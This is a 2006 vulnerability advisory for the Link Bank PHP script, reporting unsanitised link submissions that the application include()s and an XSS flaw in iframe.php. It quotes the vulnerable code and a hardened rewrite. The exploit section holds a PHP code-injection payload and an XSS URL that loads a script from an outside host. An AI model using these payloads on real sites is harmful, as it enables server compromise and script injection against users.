Link Bank code execution and XSS

2006-03-07T00:00:00
ID SECURITYVULNS:DOC:11723
Type securityvulns
Reporter Securityvulns
Modified 2006-03-07T00:00:00

Description

-------- summary
software: Link Bank
vendor's website: http://daverave.64digits.com/index.php?page=linkbank
versions: n/a
class: remote
status: unpatched
exploit: available
solution: not available
discovered by: retard
risk level: high

-------- description
Link Bank does not sanitise posts submitted to it, allowing users to insert data that can be used maliciously. After it is submitted, the data goes to a .txt file which the application reads and executes to display the submitted links. Along with this, it is vulnerable to XSS because the application again does not sanitise the variable.

    in ./content/index.txt:

    <?php
    // include() executes any PHP code found in links.txt
    include("links.txt");
    ?>

    in ./content/add_link.txt:

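    // request values are taken as-is, with no validation or escaping
    $url_name = $_REQUEST['url_name'];
    $url = $_REQUEST['url'];
    $img = $_REQUEST['img'];
    $filename = "content/links.txt";
    // the raw values are interpolated straight into the stored markup
    $code = "<a href = iframe.php?site=$url target=_blank>$url_name</a><br>";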

    in ./iframe.php:

    <title>Link Bank - <?php echo"$site";?></title>
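A hardened form of the three snippets above, as an added example that is not Link Bank's code or the reporter's: submissions are stored as data that is never include()d, and every value is escaped on output. The lb_* function names, the JSON-lines store and the sample inputs are assumptions made for this sketch.

```php
<?php
// Added example, not Link Bank's code: lb_* names and the JSON-lines store are assumptions.

// Accept only absolute http(s) URLs; anything else is rejected.
function lb_clean_url(string $url): ?string {
    $url = trim($url);
    if (filter_var($url, FILTER_VALIDATE_URL) === false) return null;
    $scheme = strtolower((string) parse_url($url, PHP_URL_SCHEME));
    return in_array($scheme, ['http', 'https'], true) ? $url : null;
}

// Store a link as one JSON line. The file is data only and is never include()d;
// JSON_HEX_TAG also keeps angle brackets, and so PHP open tags, out of the file.
function lb_add_link(string $file, string $name, string $url): bool {
    $url = lb_clean_url($url);
    if ($url === null || trim($name) === '') return false;
    $line = json_encode(['name' => trim($name), 'url' => $url], JSON_HEX_TAG) . "\n";
    return file_put_contents($file, $line, FILE_APPEND | LOCK_EX) !== false;
}

// Render stored links, escaping each value for the context it lands in.
function lb_render_links(string $file): string {
    $html = '';
    $lines = is_file($file) ? file($file, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES) : [];
    foreach ($lines as $line) {
        $row = json_decode($line, true);
        if (!is_array($row) || !is_string($row['name'] ?? null) || !is_string($row['url'] ?? null)) continue;
        $href = 'iframe.php?site=' . rawurlencode($row['url']);
        $html .= '<a href="' . htmlspecialchars($href, ENT_QUOTES, 'UTF-8')
               . '" target="_blank" rel="noopener">'
               . htmlspecialchars($row['name'], ENT_QUOTES, 'UTF-8') . "</a><br>\n";
    }
    return $html;
}

// iframe.php title: read the parameter explicitly and HTML-escape it.
function lb_title(array $query): string {
    $site = isset($query['site']) && is_string($query['site']) ? $query['site'] : '';
    return '<title>Link Bank - ' . htmlspecialchars($site, ENT_QUOTES, 'UTF-8') . '</title>';
}

// Constructed sample input: markup and PHP tags arrive as inert text.
$file = tempnam(sys_get_temp_dir(), 'lb');
lb_add_link($file, '<?php echo "x"; ?>', 'https://example.com/');
lb_add_link($file, 'rejected', 'javascript:alert(1)');
echo lb_render_links($file);
echo lb_title(['site' => '</title><script>1</script>']), "\n";
unlink($file);
```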

-------- exploit(s)

    code execution:

submit something like <?php exec($cmd) ?> as a link name

    xss:

http://example.com/iframe.php?site=%3C/title%3E%3C/head%3E%3Cscript%20src=http://notlegal.ws/xss.js%3E%3C/script%3E

-------- credit
author(s): retard
email: retard@30gigs.com